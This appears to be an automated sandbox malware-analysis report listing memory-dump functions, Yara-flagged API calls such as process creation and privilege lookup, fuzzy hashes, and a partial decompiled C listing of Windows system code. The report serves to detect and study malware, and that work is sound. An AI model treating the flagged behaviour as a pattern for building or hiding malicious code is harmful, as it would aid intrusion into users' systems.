Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0214F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214F90E

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0214F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214F9FB

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0214FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FEDB

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0214FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FFBF

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 0214FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FC6B

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0214FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FD9A

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0214FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FDCB

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0009A054, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D

Strings

.z`, xrefs: 0009A07C, 0009A088

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 6188d27810c59196c023f2881b901dca42ae3bd65ee8c738b7b41b36f9f10842
Instruction ID: 513a2c086db2988047042dc563133ea47b4443bbce2c0b3822d425b523538965
Opcode Fuzzy Hash: 6188d27810c59196c023f2881b901dca42ae3bd65ee8c738b7b41b36f9f10842
Instruction Fuzzy Hash: F7019E75640214BFDB25DF68DC46EEB77ACEF89350F014169BD1DAB242C631E910CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D

Strings

oL, xrefs: 0009A029

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: oL
API String ID: 1279760036-2581261730
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: fb531f36ecf60f8f990f8beeb336912dc4c8dd0bca289f823f6bbc923f289a64
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: E3E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BE185B242C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D

Strings

.z`, xrefs: 0009A07C, 0009A088

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a291e4ec65558c5148eedba6729c149e861a9d856c25b40a8d06025144360991
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 25E012B1200208ABDB18EF99CC49EA777ACAF88750F018558BE185B242C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 000882E8, Relevance: 3.1, APIs: 2, Instructions: 61threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3aae11262744c73038abc45b4b1164d1f11d84ad20235de747ad0a044b21b7cf
Instruction ID: af0f0aaec70906594a2063e6af34f32865ded44ed5a4320e4a93c58ebf543e72
Opcode Fuzzy Hash: 3aae11262744c73038abc45b4b1164d1f11d84ad20235de747ad0a044b21b7cf
Instruction Fuzzy Hash: A201B531A802187BFB20B6989D43FFE776CBB41B50F144159FF04BA1C3E6A46A0647E2

Uniqueness

Uniqueness Score: -1.00%

Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
Instruction ID: c4677aae8ac412207fcf983d3e5240e210b60c1715605391d1e4e03da92c4e84
Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
Instruction Fuzzy Hash: DD018431A802287BFB20B6949C03FFE766C6B41F50F044119FF04BA1C2EA946A0647E6

Uniqueness

Uniqueness Score: -1.00%

Function 0009A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A124

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: be69a164b90f52cdf138f11d4f4c16ae0c8f1d3ca4b73922774bedb9ce3d57f5
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7E01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0009A1B1, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7dcbd23085a6eb69aaad0506dbf3914a1ddc452338454eb900dfe2bcd6168ec5
Instruction ID: ce5fdd942a9ea0497dd0573bc939c4e0dd8c6fefd75de4d6ea958ff2a4f48b78
Opcode Fuzzy Hash: 7dcbd23085a6eb69aaad0506dbf3914a1ddc452338454eb900dfe2bcd6168ec5
Instruction Fuzzy Hash: 4AF055B02082045BCB10EF58DC42EEB3BA8EF42320F14499DFC9D1B203C634D40587B6

Uniqueness

Uniqueness Score: -1.00%

Function 0009A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 89bb538c540c149beddcab492b13c1476a756bae682638512484373e91ae5804
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: B2E01AB16002086BDB10DF49CC85EE737ADAF89650F018154BE0C57242C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008F689, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1e25b0bc04352f25e9bf346f0e407aa7b1964f2b07830c21a8453bfb57e724be
Instruction ID: 12ba189263834d7eb68cdbfabf2ec3c14694b8f3a9f9d77f9c783406df6a82e0
Opcode Fuzzy Hash: 1e25b0bc04352f25e9bf346f0e407aa7b1964f2b07830c21a8453bfb57e724be
Instruction Fuzzy Hash: 47D0C7222983002AEB10FAA48C12F62B2C86B04715F080868F988DA2C3EA60D4008222

Uniqueness

Uniqueness Score: -1.00%

Function 0008F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6BB

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 61ef560bb03ba9adce2078f54508012ad0f896a2dd35becffac913c9d2969378
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: A6D0A7727943043BEA10FAA49C03F6632CC7B44B14F490074F948DB3C3E960E4114165

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02178788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02178788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02178460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0215E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0217718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02178460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0217718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02178460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02178460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02178460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0217718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0215E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02152340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0216E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0215E2A8(_t322,  &_v68, _v16);
								if(E02175553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0216E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0215E2A8(_t322,  &_v68, _t236);
								if(E02175553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0217718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0215E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02152340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0216E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0215E2A8(_v12,  &_v68, _v16);
							if(E02175553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0216E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0215E2A8(_t322,  &_v68, _t269);
							if(E02175553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0217718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0215E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02152340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0216E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0215E2A8(_v12,  &_v68, _v16);
						if(E02175553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0216E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0215E2A8(_t322,  &_v68, _t296);
						if(E02175553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0215E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x02178788
0x02178788
0x02178791
0x02178794
0x02178798
0x0217879b
0x0217879e
0x021787a1
0x021787a4
0x021787a7
0x021787aa
0x021787af
0x021c1ad3
0x02178b0a
0x02178b0d
0x02178b13
0x02178b19
0x02178b1f
0x02178b25
0x02178b2b
0x02178b31
0x02178b37
0x02178b3d
0x02178b46
0x02178b46
0x021787c6
0x021787d0
0x021c1ae0
0x021c1ae6
0x021c1af8
0x021c1af8
0x021c1afd
0x021c1afe
0x021c1b01
0x021c1b06
0x021c1b06
0x021787d6
0x021787f2
0x021787f7
0x02178807
0x0217880a
0x0217880f
0x02178810
0x02178813
0x02178818
0x02178818
0x0217882c
0x02178831
0x02178838
0x02178908
0x02178920
0x021789f0
0x02178a08
0x02178af6
0x02178af6
0x02178af8
0x02178afb
0x021c1beb
0x021c1beb
0x02178b04
0x021c1bf8
0x021c1c0e
0x021c1c13
0x021c1c16
0x021c1c16
0x021c1bf8
0x00000000
0x02178b04
0x02178a0e
0x02178a11
0x02178a14
0x02178a15
0x02178a18
0x02178a22
0x02178b59
0x02178a28
0x02178a3c
0x02178a3c
0x02178a42
0x021c1bb0
0x021c1b11
0x021c1b11
0x00000000
0x02178a48
0x02178a51
0x02178a5b
0x02178a5e
0x02178a61
0x02178a69
0x02178a69
0x02178a6d
0x00000000
0x00000000
0x02178a74
0x02178a7c
0x02178a7d
